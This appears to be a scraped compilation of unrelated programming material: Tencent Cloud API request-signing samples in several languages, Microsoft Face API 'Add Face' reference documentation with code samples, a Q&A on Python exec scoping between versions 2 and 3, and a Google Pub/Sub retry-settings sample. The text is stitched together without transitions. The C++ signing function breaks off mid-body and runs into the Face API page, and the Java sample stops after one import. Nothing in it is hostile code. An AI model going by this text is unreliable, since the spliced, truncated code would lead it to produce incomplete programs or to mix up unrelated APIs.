$stringToSign = $algorithm."\n"
.$timestamp."\n"
.$credentialScope."\n"
.$hashedCanonicalRequest;
echo $stringToSign.PHP_EOL;
// step 3: sign string
$secretDate = hash_hmac("SHA256", $date, "TC3".$secretKey, true);
$secretService = hash_hmac("SHA256", $service, $secretDate, true);
$secretSigning = hash_hmac("SHA256", "tc3_request", $secretService, true);
$signature = hash_hmac("SHA256", $stringToSign, $secretSigning);
echo $signature.PHP_EOL;
// step 4: build authorization
$authorization = $algorithm
." Credential=".$secretId."/".$credentialScope
.", SignedHeaders=content-type;host, Signature=".$signature;
echo $authorization.PHP_EOL;
$curl = "curl -X POST https://".$host
.' -H "Authorization: '.$authorization.'"'
.' -H "Content-Type: application/json; charset=utf-8"'
.' -H "Host: '.$host.'"'
.' -H "X-TC-Action: '.$action.'"'
.' -H "X-TC-Timestamp: '.$timestamp.'"'
.' -H "X-TC-Version: '.$version.'"'
.' -H "X-TC-Region: '.$region.'"'
." -d '".$payload."'";
echo $curl.PHP_EOL;
# -*- coding: UTF-8 -*-
# require ruby>=2.3.0
require 'digest'
require 'json'
require 'time'
require 'openssl'
# Key Parameters
secret_id = 'AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******'
secret_key = 'Gu5t9xGARNpq86cd98joQYCN3*******'
service = 'cvm'
host = 'cvm.tencentcloudapi.com'
endpoint = 'https://' + host
region = 'ap-guangzhou'
action = 'DescribeInstances'
version = '2017-03-12'
algorithm = 'TC3-HMAC-SHA256'
# timestamp = Time.now.to_i
timestamp = 1551113065
date = Time.at(timestamp).utc.strftime('%Y-%m-%d')
# ************* Step 1: Concatenate the CanonicalRequest string *************
http_request_method = 'POST'
canonical_uri = '/'
canonical_querystring = ''
canonical_headers = "content-type:application/json; charset=utf-8\nhost:#{host}\n"
signed_headers = 'content-type;host'
# params = { 'Limit' => 1, 'Filters' => [{ 'Name' => 'instance-name', 'Values' => ['unnamed'] }] }
# payload = JSON.generate(params, { 'ascii_only' => true, 'space' => ' ' })
# json will generate in random order, to get specified result in example, we hard-code it here.
payload = '{"Limit": 1, "Filters": [{"Values": ["unnamed"], "Name": "instance-name"}]}'
hashed_request_payload = Digest::SHA256.hexdigest(payload)
canonical_request = [
http_request_method,
canonical_uri,
canonical_querystring,
canonical_headers,
signed_headers,
hashed_request_payload,
].join("\n")
puts canonical_request
# ************* Step 2: Concatenate the string to sign *************
credential_scope = date + '/' + service + '/' + 'tc3_request'
hashed_request_payload = Digest::SHA256.hexdigest(canonical_request)
string_to_sign = [
algorithm,
timestamp.to_s,
credential_scope,
hashed_request_payload,
].join("\n")
puts string_to_sign
# ************* Step 3: Calculate the Signature *************
digest = OpenSSL::Digest.new('sha256')
secret_date = OpenSSL::HMAC.digest(digest, 'TC3' + secret_key, date)
secret_service = OpenSSL::HMAC.digest(digest, secret_date, service)
secret_signing = OpenSSL::HMAC.digest(digest, secret_service, 'tc3_request')
signature = OpenSSL::HMAC.hexdigest(digest, secret_signing, string_to_sign)
puts signature
# ************* Step 4: Concatenate the Authorization *************
authorization = "#{algorithm} Credential=#{secret_id}/#{credential_scope}, SignedHeaders=#{signed_headers}, Signature=#{signature}"
puts authorization
puts 'curl -X POST ' + endpoint \
+ ' -H "Authorization: ' + authorization + '"' \
+ ' -H "Content-Type: application/json; charset=utf-8"' \
+ ' -H "Host: ' + host + '"' \
+ ' -H "X-TC-Action: ' + action + '"' \
+ ' -H "X-TC-Timestamp: ' + timestamp.to_s + '"' \
+ ' -H "X-TC-Version: ' + version + '"' \
+ ' -H "X-TC-Region: ' + region + '"' \
+ " -d '" + payload + "'"
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
public class Application
{
public static string SHA256Hex(string s)
{
using (SHA256 algo = SHA256.Create())
{
byte[] hashbytes = algo.ComputeHash(Encoding.UTF8.GetBytes(s));
StringBuilder builder = new StringBuilder();
for (int i = 0; i < hashbytes.Length; ++i)
{
builder.Append(hashbytes[i].ToString("x2"));
}
return builder.ToString();
}
}
public static byte[] HmacSHA256(byte[] key, byte[] msg)
{
using (HMACSHA256 mac = new HMACSHA256(key))
{
return mac.ComputeHash(msg);
}
}
public static Dictionary<String, String> BuildHeaders(string secretid,
string secretkey, string service, string endpoint, string region,
string action, string version, DateTime date, string requestPayload)
{
string datestr = date.ToString("yyyy-MM-dd");
DateTime startTime = new DateTime(1970, 1, 1, 0, 0, 0, 0, DateTimeKind.Utc);
long requestTimestamp = (long)Math.Round((date - startTime).TotalMilliseconds, MidpointRounding.AwayFromZero) / 1000;
// ************* Step 1: Concatenate the CanonicalRequest string *************
string algorithm = "TC3-HMAC-SHA256";
string httpRequestMethod = "POST";
string canonicalUri = "/";
string canonicalQueryString = "";
string contentType = "application/json";
string canonicalHeaders = "content-type:" + contentType + "; charset=utf-8\n" + "host:" + endpoint + "\n";
string signedHeaders = "content-type;host";
string hashedRequestPayload = SHA256Hex(requestPayload);
string canonicalRequest = httpRequestMethod + "\n"
+ canonicalUri + "\n"
+ canonicalQueryString + "\n"
+ canonicalHeaders + "\n"
+ signedHeaders + "\n"
+ hashedRequestPayload;
Console.WriteLine(canonicalRequest);
Console.WriteLine("----------------------------------");
// ************ Step 2: Concatenate the string to sign *************
string credentialScope = datestr + "/" + service + "/" + "tc3_request";
string hashedCanonicalRequest = SHA256Hex(canonicalRequest);
string stringToSign = algorithm + "\n" + requestTimestamp.ToString() + "\n" + credentialScope + "\n" + hashedCanonicalRequest;
Console.WriteLine(stringToSign);
Console.WriteLine("----------------------------------");
// ************* Step 3: Calculate the signature *************
byte[] tc3SecretKey = Encoding.UTF8.GetBytes("TC3" + secretkey);
byte[] secretDate = HmacSHA256(tc3SecretKey, Encoding.UTF8.GetBytes(datestr));
byte[] secretService = HmacSHA256(secretDate, Encoding.UTF8.GetBytes(service));
byte[] secretSigning = HmacSHA256(secretService, Encoding.UTF8.GetBytes("tc3_request"));
byte[] signatureBytes = HmacSHA256(secretSigning, Encoding.UTF8.GetBytes(stringToSign));
string signature = BitConverter.ToString(signatureBytes).Replace("-", "").ToLower();
Console.WriteLine(signature);
Console.WriteLine("----------------------------------");
// ************* Step 4: Concatenate the Authorization *************
string authorization = algorithm + " "
+ "Credential=" + secretid + "/" + credentialScope + ", "
+ "SignedHeaders=" + signedHeaders + ", "
+ "Signature=" + signature;
Console.WriteLine(authorization);
Console.WriteLine("----------------------------------");
Dictionary<string, string> headers = new Dictionary<string, string>();
headers.Add("Authorization", authorization);
headers.Add("Host", endpoint);
headers.Add("Content-Type", contentType + "; charset=utf-8");
headers.Add("X-TC-Timestamp", requestTimestamp.ToString());
headers.Add("X-TC-Version", version);
headers.Add("X-TC-Action", action);
headers.Add("X-TC-Region", region);
return headers;
}
public static void Main(string[] args)
{
// SecretID and SecretKey
string SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******";
string SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******";
string service = "cvm";
string endpoint = "cvm.tencentcloudapi.com";
string region = "ap-guangzhou";
string action = "DescribeInstances";
string version = "2017-03-12";
// The timestamp `2019-02-26 00:44:25` used here is only for reference. In a project, use the following parameter:
// DateTime date = DateTime.UtcNow;
// Enter the correct time zone. We recommend using UTC timestamp to avoid errors.
DateTime date = new DateTime(1970, 1, 1, 0, 0, 0, 0, DateTimeKind.Utc).AddSeconds(1551113065);
string requestPayload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"\\u672a\\u547d\\u540d\"], \"Name\": \"instance-name\"}]}";
Dictionary<string, string> headers = BuildHeaders(SECRET_ID, SECRET_KEY, service
, endpoint, region, action, version, date, requestPayload);
Console.WriteLine("POST https://cvm.tencentcloudapi.com");
foreach (KeyValuePair<string, string> kv in headers)
{
Console.WriteLine(kv.Key + ": " + kv.Value);
}
Console.WriteLine();
Console.WriteLine(requestPayload);
}
}
const crypto = require('crypto');
function sha256(message, secret = '', encoding) {
const hmac = crypto.createHmac('sha256', secret)
return hmac.update(message).digest(encoding)
}
function getHash(message, encoding = 'hex') {
const hash = crypto.createHash('sha256')
return hash.update(message).digest(encoding)
}
function getDate(timestamp) {
const date = new Date(timestamp * 1000)
const year = date.getUTCFullYear()
const month = ('0' + (date.getUTCMonth() + 1)).slice(-2)
const day = ('0' + date.getUTCDate()).slice(-2)
return `${year}-${month}-${day}`
}
function main(){
const SECRET_ID = "AKIDz8krbsJ5yKBZQpn74WFkmLPx3*******"
const SECRET_KEY = "Gu5t9xGARNpq86cd98joQYCN3*******"
const endpoint = "cvm.tencentcloudapi.com"
const service = "cvm"
const region = "ap-guangzhou"
const action = "DescribeInstances"
const version = "2017-03-12"
//const timestamp = getTime()
const timestamp = 1551113065
const date = getDate(timestamp)
// ************* Step 1: Concatenate the CanonicalRequest string *************
const signedHeaders = "content-type;host"
const payload = "{\"Limit\": 1, \"Filters\": [{\"Values\": [\"unnamed\"], \"Name\": \"instance-name\"}]}"
const hashedRequestPayload = getHash(payload);
const httpRequestMethod = "POST"
const canonicalUri = "/"
const canonicalQueryString = ""
const canonicalHeaders = "content-type:application/json; charset=utf-8\n" + "host:" + endpoint + "\n"
const canonicalRequest = httpRequestMethod + "\n"
+ canonicalUri + "\n"
+ canonicalQueryString + "\n"
+ canonicalHeaders + "\n"
+ signedHeaders + "\n"
+ hashedRequestPayload
console.log(canonicalRequest)
console.log("----------------------------")
// ************* Step 2: Concatenate the string to sign *************
const algorithm = "TC3-HMAC-SHA256"
const hashedCanonicalRequest = getHash(canonicalRequest);
const credentialScope = date + "/" + service + "/" + "tc3_request"
const stringToSign = algorithm + "\n" +
timestamp + "\n" +
credentialScope + "\n" +
hashedCanonicalRequest
console.log(stringToSign)
console.log("----------------------------")
// ************* Step 3: Calculate the signature *************
const kDate = sha256(date, 'TC3' + SECRET_KEY)
const kService = sha256(service, kDate)
const kSigning = sha256('tc3_request', kService)
const signature = sha256(stringToSign, kSigning, 'hex')
console.log(signature)
console.log("----------------------------")
// ************* Step 4: Concatenate the Authorization *************
const authorization = algorithm + " " +
"Credential=" + SECRET_ID + "/" + credentialScope + ", " +
"SignedHeaders=" + signedHeaders + ", " +
"Signature=" + signature
console.log(authorization)
console.log("----------------------------")
const Call_Information = 'curl -X POST ' + "https://" + endpoint
+ ' -H "Authorization: ' + authorization + '"'
+ ' -H "Content-Type: application/json; charset=utf-8"'
+ ' -H "Host: ' + endpoint + '"'
+ ' -H "X-TC-Action: ' + action + '"'
+ ' -H "X-TC-Timestamp: ' + timestamp.toString() + '"'
+ ' -H "X-TC-Version: ' + version + '"'
+ ' -H "X-TC-Region: ' + region + '"'
+ " -d '" + payload + "'"
console.log(Call_Information)
}
main()
#include <iostream>
#include <iomanip>
#include <sstream>
#include <string>
#include <stdio.h>
#include <time.h>
#include <openssl/sha.h>
#include <openssl/hmac.h>
using namespace std;
string get_data(int64_t &timestamp)
{
string utcDate;
char buff[20] = {0};
// time_t timenow;
struct tm sttime;
sttime = *gmtime(&timestamp);
strftime(buff, sizeof(buff), "%Y-%m-%d", &sttime);
utcDate = string(buff);
return utcDate;
}
string int2str(int64_t n)
{
std::stringstream ss;
ss << n;
return ss.str();
}
string sha256Hex(const string &str)
{
char buf[3];
unsigned char hash[SHA256_DIGEST_LENGTH];
SHA256_CTX sha256;
SHA256_Init(&sha256);
SHA256_Update(&sha256, str.c_str(), str.size());
SHA256_Final(hash, &sha256);
std::string NewString = "";
for(int i = 0; i < SHA256_DIGEST_LENGTH; i++)
{
snprintf(buf, sizeof(buf), "%02x", hash[i]);
NewString = NewString + buf;
}
return NewString;
}
string HmacSha256(const string &key, const string &input)
{
unsigned char hash[32];
HMAC_CTX *h;
#if OPENSSL_VERSION_NUMBER < 0x10100000L
HMAC_CTX hmac;
HMAC_CTX_init(&hmac);
h = &hmac;
#else
h = HMAC_CTX_new();
#endif
HMAC_Init_ex(h, &key[0], key.length(), EVP_sha256(), NULL);
HMAC_Update(h, ( unsigned char* )&input[0], input.length());
unsigned int len = 32;
HMAC_Final(h, hash, &len);
#if OPENSSL_VERSION_NUMBER < 0x10100000L
HMAC_CTX_cleanup(h);
#else
HMAC_CTX_free(h);
#endif
std::stringstream ss;
ss << std::setfill('0');
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
PersonGroup Person - Add Face
Add a face to a person in a person group for face identification or verification. To deal with an image containing multiple faces, the input face can be specified as an image with a targetFace rectangle. The call returns a persistedFaceId representing the added face. No image will be stored: only the extracted face feature(s) will be stored on the server, until PersonGroup PersonFace - Delete, PersonGroup Person - Delete, or PersonGroup - Delete is called.
Note that persistedFaceId is different from the faceId generated by Face - Detect.
Higher face image quality means better recognition precision. Please use high-quality faces: frontal, clear, and with a face size of 200x200 pixels (100 pixels between the eyes) or bigger.
Each person entry can hold up to 248 faces.
JPEG, PNG, GIF (the first frame), and BMP format are supported. The allowed image file size is from 1KB to 6MB.
"targetFace" rectangle should contain one face. Zero or multiple faces will be regarded as an error. If the provided "targetFace" rectangle is not returned from Face - Detect, there’s no guarantee to detect and add the face successfully.
Faces outside the detectable size range (36x36 - 4096x4096 pixels), with a large head pose, or with large occlusions will cause failures.
Adding/deleting faces to/from the same person is processed sequentially; adding/deleting faces to/from different persons is processed in parallel.
The minimum detectable face size is 36x36 pixels in an image no larger than 1920x1080 pixels. Images with dimensions higher than 1920x1080 pixels will need a proportionally larger minimum face size.
Different 'detectionModel' values can be provided. To use and compare different detection models, please refer to How to specify a detection model
'detection_01': The default detection model for PersonGroup Person - Add Face. Recommended for near-frontal face detection. Faces at exceptionally large angles (head poses), occluded faces, or faces in wrongly oriented images may not be detected.
'detection_02': Detection model released in 2019 May with improved accuracy especially on small, side and blurry faces.
HTTP Method
POST
Request URL
Request parameters
personGroupId - Specifying the person group containing the target person.
personId - Target person that the face is added to.
userData (optional) - User-specified data about the target face to add for any purpose. The maximum length is 1KB.
targetFace (optional) - A face rectangle to specify the target face to be added to a person, in the format of "targetFace=left,top,width,height". E.g. "targetFace=10,10,100,100". If there is more than one face in the image, targetFace is required to specify which face to add. No targetFace means there is only one face detected in the entire image.
detectionModel (optional) - The 'detectionModel' associated with the detected faceIds. Supported 'detectionModel' values include "detection_01" or "detection_02". The default value is "detection_01".
Request headers
Request body
JSON fields in request body:
Fields Type Description
url String Face image URL. Valid image size is from 1KB to 6MB. Only one face is allowed per image.
{
"url": "http://example.com/1.jpg"
}
{
[binary data]
}
Response 200
A successful call returns the new persistedFaceId.
JSON fields in response body:
Fields Type Description
persistedFaceId String persistedFaceId of the added face, which is persisted and will not expire. Different from faceId which is created in Face - Detect and will expire in 24 hours after the detection call.
{
"persistedFaceId": "B8D802CF-DD8F-4E61-B15C-9E6C5844CCBA"
}
Response 400
Error code and message returned in JSON:
Error Code Error Message Description
BadArgument 'userData' is too long.
BadArgument Invalid request body.
BadArgument Argument targetFace out of range, targetFace is valid but it's intersection with the entire image is empty.
BadArgument Invalid argument targetFace. Caused by invalid string format or invalid left/top/height/width value.
BadArgument 'detectionModel' is invalid.
InvalidImage Decoding error, image format unsupported.
InvalidImage No face detected in the image or in the specified targetFace area.
InvalidImage There is more than 1 face in the image or in the specified targetFace area.
InvalidImageSize Image size is too small.
InvalidImageSize Image size is too big.
InvalidURL Invalid image URL.
InvalidURL Failed to download from target server. Remote server error returned.
{
"error": {
"code": "BadArgument",
"message": "Request body is invalid."
}
}
Response 401
Error code and message returned in JSON:
Error Code Error Message Description
Unspecified Invalid subscription Key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
Persisted face number reached limit, maximum is 248 per person.
{
"error": {
"code": "QuotaExceeded",
"message": "Persisted face number reached limit."
}
}
Response 404
Error code and message returned in JSON:
Error Code Error Message Description
PersonGroupNotFound Person group ID is invalid. Valid format should be a string composed by numbers, English letters in lower case, '-', '_', and no longer than 64 characters.
PersonGroupNotFound Person group is not found.
PersonNotFound Person ID is invalid.
PersonNotFound Person is not found.
{
"error": {
"code": "PersonGroupNotFound",
"message": "Person group is not found."
}
}
Response 408
{
"error": {
"code": "OperationTimeOut",
"message": "Request Timeout."
}
}
Response 409
Error code and message returned in JSON:
Error Code Error Message Description
PersonGroupTrainingNotFinished The person group is still under training. Try again after training completed.
ConcurrentOperationConflict Concurrent operation conflict on requested resource.
{
"error": {
"code": "PersonGroupTrainingNotFinished",
"message": "Person group is under training."
}
}
Response 415
Unsupported media type error. Content-Type is not in the allowed types:
For an image URL, Content-Type should be application/json
For a local image, Content-Type should be application/octet-stream
{
"error": {
"code": "BadArgument",
"message": "Invalid Media Type."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF

curl -v -X POST "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?userData={string}&targetFace={string}&detectionModel=detection_01" ^
-H "Content-Type: application/json" ^
-H "Ocp-Apim-Subscription-Key: {subscription key}" ^
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["userData"] = "{string}";
queryString["targetFace"] = "{string}";
queryString["detectionModel"] = "detection_01";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?" + queryString;
HttpResponseMessage response;
// Request body
byte[] byteData = Encoding.UTF8.GetBytes("{body}");
using (var content = new ByteArrayContent(byteData))
{
content.Headers.ContentType = new MediaTypeHeaderValue("< your content type, i.e. application/json >");
response = await client.PostAsync(uri, content);
}
}
}
}
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces");
builder.setParameter("userData", "{string}");
builder.setParameter("targetFace", "{string}");
builder.setParameter("detectionModel", "detection_01");
URI uri = builder.build();
HttpPost request = new HttpPost(uri);
request.setHeader("Content-Type", "application/json");
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"userData": "{string}",
"targetFace": "{string}",
"detectionModel": "detection_01",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Content-Type","application/json");
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "POST",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces";
NSArray* array = @[
// Request parameters
@"entities=true",
@"userData={string}",
@"targetFace={string}",
@"detectionModel=detection_01",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"POST"];
// Request headers
[_request setValue:@"application/json" forHTTPHeaderField:@"Content-Type"];
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the PEAR HTTP_Request2 package (http://pear.php.net/package/HTTP_Request2)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces');
$url = $request->getUrl();
$headers = array(
// Request headers
'Content-Type' => 'application/json',
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_POST);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64

headers = {
    # Request headers
    'Content-Type': 'application/json',
    'Ocp-Apim-Subscription-Key': '{subscription key}',
}

params = urllib.urlencode({
    # Request parameters
    'userData': '{string}',
    'targetFace': '{string}',
    'detectionModel': 'detection_01',
})

try:
    conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("POST", "/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print(e)
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64

headers = {
    # Request headers
    'Content-Type': 'application/json',
    'Ocp-Apim-Subscription-Key': '{subscription key}',
}

params = urllib.parse.urlencode({
    # Request parameters
    'userData': '{string}',
    'targetFace': '{string}',
    'detectionModel': 'detection_01',
})

try:
    conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("POST", "/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print(e)
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/persongroups/{personGroupId}/persons/{personId}/persistedFaces')
uri.query = URI.encode_www_form({
# Request parameters
'userData' => '{string}',
'targetFace' => '{string}',
'detectionModel' => 'detection_01'
})
request = Net::HTTP::Post.new(uri.request_uri)
# Request headers
request['Content-Type'] = 'application/json'
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
# Python 2.6: prints 'it is working'
# Python 3.1.2: "NameError: global name 'a_func' is not defined"
class Testing(object):
    def __init__(self):
        exec("""def a_func(): print('it is working')""")
        a_func()

Testing()
# Python 2.6: prints 'it is working'
# Python 3.1.2: prints 'it is working'
class Testing(object):
    def __init__(self):
        def a_func():
            print('it is working')
        a_func()

Testing()
Since the standard function definition works in both Python versions, I assume the problem must be a change in how exec works. I read the API docs for exec in 2.6 and 3, as well as the "What's New In Python 3.0" page, and couldn't see any reason why the code would break.
You can inspect the bytecode generated by each Python version with:
>>> from dis import dis
And, for each interpreter:
# Python 3.2
>>> dis(Testing.__init__)
...
  5          10 LOAD_GLOBAL              1 (a_func)
...

# Python 2.7
>>> dis(Testing.__init__)
...
  5           8 LOAD_NAME                0 (a_func)
...
As you can see, Python 3.2 looks up a global (LOAD_GLOBAL) named a_func, while 2.7 searches the local scope first (LOAD_NAME) before falling back to the global one.
If you print(locals()) after the exec, you will see that a_func is created inside the __init__ function.
I don't really know why it is done this way, but it appears to be a change in how symbol tables are processed.
By the way, declaring a_func = None at the top of your __init__ method so the interpreter knows it is a local variable won't work either: the bytecode then becomes LOAD_FAST, which doesn't perform a lookup at all but fetches the value directly from a slot.
The only solution I can see is to pass globals() as the second argument to exec, so that a_func is created as a global function and can be reached through the LOAD_GLOBAL operation.
Edit
If you remove the exec statement, Python 2.7 switches the bytecode from LOAD_NAME to LOAD_GLOBAL. So with exec present, your code will always be slower on Python 2.x, because the interpreter has to watch for changes to the local scope.
Since exec in Python 3 is not a keyword, the interpreter cannot be sure you are really executing new code rather than doing something else entirely... so the bytecode doesn't change.
E.g.
>>> exec = len
>>> exec([1,2,3])
3
tl;dr
exec('...', globals()) can solve the problem, if you don't mind the result being added to the global namespace.
Completing the previous answer, just in case: if the exec sits inside a function, I would recommend using the three-argument form, as follows:

def f():
    d = {}
    exec("def myfunc(): ...", globals(), d)
    d["myfunc"]()

This is the cleanest solution, since it doesn't modify any namespace behind your back; instead, myfunc is stored in the explicit dictionary d.
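For completeness, here is a runnable version of the same pattern with the '...' placeholder filled in; the function body is just an illustration:

def f():
    d = {}
    exec("def myfunc(): return 'it is working'", globals(), d)
    return d["myfunc"]()

print(f())  # it is working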
Applies retry delay and/or retry timeout settings on the publisher client or publish requests.
Code Sample
C#
using Google.Api.Gax.Grpc;
using Google.Cloud.PubSub.V1;
using Grpc.Core;
using System;
using System.Threading.Tasks;
public class PublishMessageWithRetrySettingsAsyncSample
{
public async Task PublishMessageWithRetrySettingsAsync(string projectId, string topicId, string messageText)
{
TopicName topicName = TopicName.FromProjectTopic(projectId, topicId);
// Retry settings control how the publisher handles retry-able failures
var maxAttempts = 3;
var initialBackoff = TimeSpan.FromMilliseconds(110); // default: 100 ms
var maxBackoff = TimeSpan.FromSeconds(70); // default : 60 seconds
var backoffMultiplier = 1.3; // default: 1.0
var totalTimeout = TimeSpan.FromSeconds(100); // default: 600 seconds
var publisher = await PublisherClient.CreateAsync(topicName,
clientCreationSettings: new PublisherClient.ClientCreationSettings(
publisherServiceApiSettings: new PublisherServiceApiSettings
{
PublishSettings = CallSettings.FromRetry(RetrySettings.FromExponentialBackoff(
maxAttempts: maxAttempts,
initialBackoff: initialBackoff,
maxBackoff: maxBackoff,
backoffMultiplier: backoffMultiplier,
retryFilter: RetrySettings.FilterForStatusCodes(StatusCode.Unavailable)))
.WithTimeout(totalTimeout)
}
)).ConfigureAwait(false);
string message = await publisher.PublishAsync(messageText);
Console.WriteLine($"Published message {message}");
}
}
C++
namespace pubsub = google::cloud::pubsub;
using google::cloud::future;
using google::cloud::StatusOr;
[](std::string project_id, std::string topic_id) {
auto topic = pubsub::Topic(std::move(project_id), std::move(topic_id));
// By default a publisher will retry for 60 seconds, with an initial backoff
// of 100ms, a maximum backoff of 60 seconds, and the backoff will grow by
// 30% after each attempt. This changes those defaults.
auto publisher = pubsub::Publisher(pubsub::MakePublisherConnection(
std::move(topic), pubsub::PublisherOptions{}, {},
pubsub::LimitedTimeRetryPolicy(
/*maximum_duration=*/std::chrono::minutes(10))
.clone(),
pubsub::ExponentialBackoffPolicy(
/*initial_delay=*/std::chrono::milliseconds(200),
/*maximum_delay=*/std::chrono::seconds(45),
/*scaling=*/2.0)
.clone()));
std::vector<future<bool>> done;
for (char const* data : {"1", "2", "3", "go!"}) {
done.push_back(
publisher.Publish(pubsub::MessageBuilder().SetData(data).Build())
.then([](future<StatusOr<std::string>> f) {
return f.get().ok();
}));
}
publisher.Flush();
int count = 0;
for (auto& f : done) {
if (f.get()) ++count;
}
std::cout << count << " messages sent successfully\n";
}
Java
import com.google.api.core.ApiFuture;
